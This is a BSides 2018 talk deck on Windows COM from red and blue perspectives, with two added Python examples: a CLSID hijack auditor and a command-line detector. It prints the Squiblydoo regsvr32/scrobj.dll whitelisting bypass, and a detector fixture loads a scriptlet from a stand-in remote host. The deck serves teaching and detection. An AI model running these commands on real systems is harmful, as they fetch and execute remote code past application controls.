BSIDES IOWA 2018
ANDREW FREEBORN
WINDOWS COM:

RED VS BLUE
NEW PHONE; WHO DIS
▸ IT Internal Audit Manager, Red Team at ACI Worldwide
▸ Previously: Red Team, Pen Tester, IT
▸ @maendarb
▸ https://vivirytech.blogspot.com
▸ There will be pictures, minimal C++
AGENDA
▸ COM background
▸ Red: COM exploitation
▸ Blue: COM defense
SURPRISE, C++
https://blogs.msdn.microsoft.com/oldnewthing/20040205-00/?p=40733
WHAT’S THIS WINDOWS COM THING?
▸ Stands for “Component Object Model”
▸ Designed in the 90s to be interoperable, portable
▸ It’s old; great books aren’t digital
▸ Not a “Shell” like CMD or PowerShell
▸ “Like” .NET and WMI
▸ Why am I so interested in this?
WHAT’S THIS WINDOWS COM THING? RULE #1: WE DON’T SPEAK ABOUT COM
▸ Used everywhere in Windows
▸ When a user copies files, embeds Excel within Word
▸ It’s abstracted away with GUIs, .Net, APIs, and no one acknowledges that COM objects are being used
COM BACKGROUND: COM LIVES EVERYWHERE
▸ Obligatory COM history
▸ Precursor to .NET
▸ Meant to solve problems developers had with things like DLLs
▸ There are so many COM objects, and they won’t go away
▸ OLE and ActiveX fit in here
▸ OLE (Object Linking and Embedding) lets you embed things (e.g. an Excel sheet inside Word)
▸ ActiveX lets Internet Explorer make bad life choices
COM BACKGROUND: COM ON PAPER IS SUPER EASY TO WORK WITH
▸ Access COM things through interfaces and objects
▸ Scripting.FileSystemObject
▸ IPersist
▸ IFileOperation
▸ WScript.Shell
http://compinfopro.com/enable-remote-desktop-enable-rdp/
COM BACKGROUND: COM MAKES YOU WORK FOR IT
▸ COM is a hot mess
COM BACKGROUND: IT’S LIKE COM MAKES UP THE RULES AS IT GOES ALONG
▸ COM is a hot mess and can live in:
▸ Windows Registry
▸ Windows made a special registry hive
▸ HKCR (HKEY_CLASSES_ROOT)
▸ A merged view of the HKLM and HKCU class registrations
▸ Threading / InProcServer32
▸ Manifest files (COM scriptlets; registration-free too!)
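The registry side of that list is where a defender usually has to look first, so here is an added example (mine, not from the talk or its author) that models the HKCR merge the slide mentions. It parses two constructed `.reg` exports, one for HKLM\Software\Classes and one for HKCU\Software\Classes, builds the merged view with the per-user hive taking precedence, and reports each CLSID's effective InprocServer32 DLL, flagging CLSIDs whose per-user entry shadows a machine-wide one or whose server lives under a user-writable path. The CLSIDs, DLL names and the profile path are placeholders, and the precedence rule is a simplified per-value model of how HKCR combines the two hives, not the registry code itself.

```python
import re

# Constructed .reg exports for this example (not real registry data);
# the CLSIDs are placeholders, not Microsoft-assigned identifiers.
HKLM_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11111111-0000-0000-0000-000000000001}]
@="Sample Shell Extension"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11111111-0000-0000-0000-000000000001}\InprocServer32]
@="C:\\Windows\\System32\\sampleext.dll"
"ThreadingModel"="Apartment"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{22222222-0000-0000-0000-000000000002}]
@="Sample Automation Server"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{22222222-0000-0000-0000-000000000002}\InprocServer32]
@="C:\\Windows\\System32\\sampleauto.dll"
"ThreadingModel"="Both"
"""

# A constructed per-user registration that re-points the first CLSID at a DLL in the profile.
HKCU_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-0000-0000-0000-000000000001}\InprocServer32]
@="C:\\Users\\alice\\AppData\\Roaming\\sampleext.dll"
"ThreadingModel"="Apartment"
"""

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def _unquote(token):
    """Strip the quotes of a REG_SZ token and undo .reg backslash escaping."""
    if len(token) >= 2 and token[0] == '"' and token[-1] == '"':
        return token[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    return token


def parse_reg_export(text):
    """Parse a .reg export into {key path: {value name: data}}; '' is the default value."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor") or line.startswith(";"):
            continue
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name = "" if m.group(1) == "@" else _unquote(m.group(1))
            keys[current][name] = _unquote(m.group(2))
    return keys


CLASSES_PREFIX = {
    "HKLM": "HKEY_LOCAL_MACHINE\\SOFTWARE\\CLASSES\\",
    "HKCU": "HKEY_CURRENT_USER\\SOFTWARE\\CLASSES\\",
}


def merged_classes_view(hklm, hkcu):
    """Simplified model of HKCR: HKLM\\Software\\Classes first, then HKCU values override."""
    view = {}
    for hive, keys in (("HKLM", hklm), ("HKCU", hkcu)):
        prefix = CLASSES_PREFIX[hive]
        for key, values in keys.items():
            if not key.upper().startswith(prefix):
                continue
            entry = view.setdefault(key[len(prefix):].upper(), {"values": {}, "source": {}})
            for name, data in values.items():
                entry["values"][name] = data
                entry["source"][name] = hive  # remember which hive supplied the value
    return view


# Path fragments a standard user can normally write to (heuristic, not exhaustive).
USER_WRITABLE = ("\\USERS\\", "%APPDATA%", "%LOCALAPPDATA%", "%TEMP%", "\\TEMP\\")


def audit_clsids(hklm_text, hkcu_text):
    """Return {CLSID: {"server": effective InprocServer32 path, "findings": [...]}}."""
    hklm, hkcu = parse_reg_export(hklm_text), parse_reg_export(hkcu_text)
    machine_only = merged_classes_view(hklm, {})
    effective = merged_classes_view(hklm, hkcu)
    report = {}
    for rel, entry in effective.items():
        parts = rel.split("\\")
        if len(parts) != 3 or parts[0] != "CLSID" or parts[2] != "INPROCSERVER32":
            continue
        clsid, server = parts[1], entry["values"].get("", "")
        findings = []
        if entry["source"].get("") == "HKCU":
            machine_server = machine_only.get(rel, {}).get("values", {}).get("")
            if machine_server and machine_server.lower() != server.lower():
                findings.append(f"per-user registration shadows machine-wide server {machine_server}")
            else:
                findings.append("registered only per-user (HKCU)")
        if any(frag in server.upper() for frag in USER_WRITABLE):
            findings.append("server DLL lives under a user-writable path")
        report[clsid] = {"server": server, "findings": findings}
    return report


if __name__ == "__main__":
    for clsid, info in audit_clsids(HKLM_EXPORT, HKCU_EXPORT).items():
        print(clsid, info["server"], info["findings"] or "ok")
```

On a real host the two inputs would come from `reg export` of the two Classes keys; the second CLSID comes back clean, while the first is reported twice, once because the HKCU entry shadows the System32 registration and once because its DLL sits in the user's profile.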
COM BACKGROUND: COM MAKES YOU WORK FOR IT
▸ WScript.Shell demo
COM BACKGROUND: COM+
ZeroSum tweeted about a COM+ scriptlet, but how would you know it’s COM+ and not COM?
COM BACKGROUND: COM+ SCRIPTLET? (MOST LIKELY IT WAS JUST COM)
▸ Scriptlets come in both COM and COM+ flavors
▸ They allow you to have COM scripts to do non-malicious things like open calculator and cmd shells
▸ Did you know you can create COM objects from a Java class? Good thing no one has a JRE installed.
https://msdn.microsoft.com/en-us/library/ms524620(v=vs.90).aspx
HAX: REGSVR32 /S /N /U /I:BACKDOOR-MINIMALIST.SCT SCROBJ.DLL
▸ subTee example: COM manifest file
▸ Demo!
https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302
COM BACKGROUND: BREAKING DOWN THAT REGSVR32 HAX
▸ regsvr32 is used to register many things in the registry
▸ /s runs it silently, /n says to not call DllRegisterServer
▸ /u specifies which COM server to uninstall
▸ /i calls DllInstall of the COM object to register
▸ Can be pointed to a file on your system
▸ Can be a URL (http: COM moniker)
▸ Could even be a Java class (java: COM moniker)
▸ scrobj.dll makes the magic go
http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html
COM BACKGROUND: COM+
▸ COM+ meant to solve the problems in COM like:
▸ Quickly implement common configurations for COM components like security boundaries
▸ Load DLLs into processes on demand
▸ Managed methods to manage COM components
▸ Multi-pass… err.. threading
▸ Slick GUI
https://msdn.microsoft.com/en-us/library/windows/desktop/ms683512(v=vs.85).aspx
COM BACKGROUND: COM+
▸ COM+ also came with rad icons in the GUI
▸ Demo!
https://msdn.microsoft.com/en-us/library/windows/desktop/ms683512(v=vs.85).aspx
COM BACKGROUND: DCOM
▸ DCOM is “Distributed COM”
▸ “Helps you” in COM and COM+ with distributed transactions
▸ Slings COM object data typically with RPC
▸ Likes to make assumptions you know what you’re doing with security and marshaling data
▸ James Forshaw and Matt Nelson have been finding problems with Windows and apps marshaling data
▸ DCOM lateral movement script (enigma0x3)
https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Invoke-DCOM.ps1
COM BACKGROUND: .NET TO COM (BECAUSE LEGACY APPS AND SADNESS)
▸ .NET can work with COM for interoperability
▸ “The Runtime Callable Wrapper (RCW) is a mechanism that promotes transparent communication between COM and the managed programming model.”
https://msdn.microsoft.com/en-us/library/office/bb610378.aspx
COM BACKGROUND: BREAKING DOWN THAT SWEET RCW GOODNESS
▸ This is what PowerShell uses to call into COM objects
https://github.com/PowerShell/PowerShell/blob/master/src/System.Management.Automation/engine/ComInterop/ComObject.cs
COM BACKGROUND: COM TO .NET (BUT WHY WOULD YOU DO THIS)
▸ COM can work with .Net through COM Callable Wrappers
▸ “When a COM client calls a .NET object, the common language runtime creates the managed object and a COM callable wrapper (CCW) for the object. Unable to reference a .NET object directly, COM clients use the CCW as a proxy for the managed object.”
https://msdn.microsoft.com/en-us/library/f07c8z1c(v=vs.85).aspx
COM BACKGROUND: DEEP TECHNICAL DETAIL OF THAT MAGIC
▸ James Forshaw talked about .Net and COM interoperability at DerbyCon 2017
▸ IronGeek Link: ig2.me/pZ
COM BACKGROUND: THE DEEPER YOU GO, THE MORE C/C++ YOU’LL KNOW
▸ To dig in more, you’re going to have to know C, C++
https://blogs.msdn.microsoft.com/oldnewthing/20040205-00/?p=40733
COM EXPLOITATION: KNOWING THE C++ STORY CAN BE HELPFUL
▸ QueryInterface is how you query… for interfaces
▸ This is how you figure out what interfaces are available to you
▸ AddRef / Release may be important to you eventually
▸ Important if you want to partake in bug bounties :)
▸ This dictates the object lifetime by reference count
▸ Abusing the reference count introduces other avenues of attack (cough Use After Free)
▸ If open redirects are still around, we should fix those first
https://blog.zsec.uk/cve-2017-3528/
COM EXPLOITATION: USE AFTER FREE HAS ALWAYS BEEN AN ISSUE
▸ Raymond Chen talked about this in 2004
▸ Exploit DB has stuff on AddRef being misused
https://blogs.msdn.microsoft.com/oldnewthing/20040406-00/?p=39903
https://www.exploit-db.com/exploits/41042/
COM EXPLOITATION: COM, THE NEVER-ENDING STRUGGLE BUS
▸ Microsoft is still fixing COM related issues
▸ CVE-2018-0880/0882 ; Forshaw - A Bridge Too Far
▸ Researched by Haifei Li, Mark Dowd, James Forshaw
▸ Links posted on https://vivirytech.blogspot.com
▸ COM has a recurring theme at conferences: forgotten/“rediscovered”, but still broke (lulz)
▸ Kinda like Adobe issues, right?
COM EXPLOITATION: WHAT ARE FUN WAYS COM HAS BEEN EXPLOITED?
▸ How is COM exploited?
▸ UACMe
▸ James Forshaw
▸ Casey Smith
▸ Matt Nelson
COM EXPLOITATION: WHAT TOOLS CAN I USE TO LEARN MORE? ALL FREE!
▸ Microsoft Process Explorer
▸ Find medium to high integrity attack paths
▸ ReactOS
▸ James Forshaw OleViewDotNet (github.com/tyranid/oleviewdotnet)
▸ See the COM goodies in Windows
▸ Find new unexplored attack COM paths!
WINDOWS COM, MICROSOFT’S GIFT TO THE RED TEAM
▸ Holy attack surface Batman! Thanks OleViewDotNet!
▸ 3,592 ways to see if you can discover a new attack path
WHAT HAPPENS WHEN I PRESS THIS BUTTON?
▸ Hey kid, wanna crash something? (this can peg your CPU)
▸ Watch with Process Monitor for potential attack paths
https://github.com/FuzzySecurity/DefCon25
fondue.exe may be a privilege escalation path
WE NEED THE BLUE TEAM, AND THEY NEED US
▸ There’s a lot of fun things that leverage COM
▸ ZeroSum’s Koadic: COM C&C
▸ MITRE’s ATT&CK framework
▸ @SubTee tweets (seriously)
▸ We need to use their research to our gain
▸ Run things like Squiblydoo to see EDR response
▸ Work with the product groups and blue team
▸ See how these products trigger IOCs and act
BLUE TEAM FUN!
▸ Are you running Windows 10 RS4 / Windows Server 2016?
▸ SpecterOps Device Guard configs / guide
▸ Are you doing PowerShell cmdline audit AND reviewing?
▸ Users probably don’t run PowerShell; if they do, require v5+
▸ Pick up on keywords like “-COMObject”
▸ Do you really need wscript and cscript enabled?
▸ It can be done, ask @fpieces, he’s done it
▸ Deters attacks leveraging DotNetToJScript
▸ Investigate the potential of SysMon and Project VAST
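The regsvr32 breakdown earlier in the deck and this blue-team checklist describe the same detection problem from two sides, so here is one added example (mine, not the speaker's or any vendor's tooling) that triages process-creation command lines for the patterns both slides name: regsvr32 loading scrobj.dll with an /i: target (a URL, a java: moniker or an .sct file), PowerShell creating COM objects with -ComObject, and wscript/cscript runs, with scripts launched from user-writable paths rated higher. The events, host name and file paths are constructed for the example; the severity labels are my own convention.

```python
import re

# Constructed process-creation events (image path, command line) for this example;
# the host name, paths and file names are placeholders, not real indicators.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\regsvr32.exe",
     "regsvr32 /s /n /u /i:http://example.invalid/backdoor-minimalist.sct scrobj.dll"),
    (r"C:\Windows\System32\regsvr32.exe",
     r'regsvr32 /s "C:\Program Files\Vendor\vendorctl.dll"'),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell.exe -NoProfile -Command "$s = New-Object -ComObject WScript.Shell; $s.SpecialFolders"'),
    (r"C:\Windows\System32\wscript.exe",
     r"wscript.exe C:\Users\bob\AppData\Local\Temp\update.js"),
    (r"C:\Windows\System32\notepad.exe", r"notepad.exe C:\Users\bob\notes.txt"),
]

# Path fragments a standard user can normally write to (heuristic, lower-case).
USER_WRITABLE = ("\\users\\", "\\temp\\", "%appdata%", "%localappdata%", "%temp%")
SCRIPT_FILE_RE = re.compile(r"\S+\.(?:sct|js|jse|vbs|vbe|wsf)\b")
# -ComObject and every unambiguous PowerShell prefix of it (-Com, -ComObj, ...),
# without matching parameters such as -Command or -ComputerName.
COMOBJECT_RE = re.compile(r"(?<![\w-])-(?:com|como|comob|comobj|comobje|comobjec|comobject)\b")


def triage(image, cmdline):
    """Return a list of (severity, reason) findings for one process-creation event."""
    exe = image.lower().rsplit("\\", 1)[-1]
    cmd = cmdline.lower()
    findings = []

    # regsvr32 + scrobj.dll + /i:<target>: the scriptlet-loading pattern from the deck.
    # Plain registrations (no scrobj.dll, no /i:) are left alone.
    if exe == "regsvr32.exe":
        m = re.search(r"/i:(\S+)", cmd)
        if m and "scrobj.dll" in cmd:
            target = m.group(1).strip('"')
            remote = target.startswith(("http:", "https:", "java:")) or target.endswith(".sct")
            findings.append(("high" if remote else "medium",
                             f"regsvr32 loaded scrobj.dll with /i:{target}"))

    # PowerShell creating COM objects: the "-COMObject" keyword the blue-team slide calls out.
    if exe in ("powershell.exe", "pwsh.exe") and COMOBJECT_RE.search(cmd):
        findings.append(("review", "PowerShell -ComObject usage"))

    # Windows Script Host: always worth a look if the host does not need it at all.
    if exe in ("wscript.exe", "cscript.exe"):
        m = SCRIPT_FILE_RE.search(cmd)
        script = m.group(0) if m else "(no script file found in command line)"
        from_user_path = any(frag in script for frag in USER_WRITABLE)
        findings.append(("medium" if from_user_path else "review",
                         f"Windows Script Host ran {script}"))
    return findings


def triage_log(events):
    """Triage a batch of (image, command line) events; one findings list per event, in order."""
    return [triage(image, cmdline) for image, cmdline in events]


if __name__ == "__main__":
    for (image, cmdline), findings in zip(SAMPLE_EVENTS, triage_log(SAMPLE_EVENTS)):
        print(cmdline)
        for severity, reason in findings:
            print(f"  [{severity}] {reason}")
```

Feed it the command-line field of whatever process-creation telemetry you already collect (Sysmon process creation events, PowerShell command-line auditing). The vendor DLL registration and the notepad launch produce nothing, which is the point: the rule keys on the scrobj.dll plus /i: combination rather than on regsvr32 itself, and the -ComObject check deliberately accepts PowerShell's prefix-abbreviated parameter names so `-Com` does not slip past it.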
IT’S ALMOST TIME TO GO, LET’S REVIEW QUICKLY
▸ COM is everywhere as it was ~20 years ago
▸ Lots of things not covered like “TreatAs” and monikers
▸ Many “exploits” are just abusing design decisions
▸ More research and community-made tools will (most likely) bring to light more COM exploits and wreckage
▸ Other organizations also add their own COM objects
▸ Sad face:
LEARN MORE AND CONTACT ME BELOW
▸ For more info about COM:
▸ https://vivirytech.blogspot.com
▸ @maendarb
▸ Slack: https://omasec.herokuapp.com
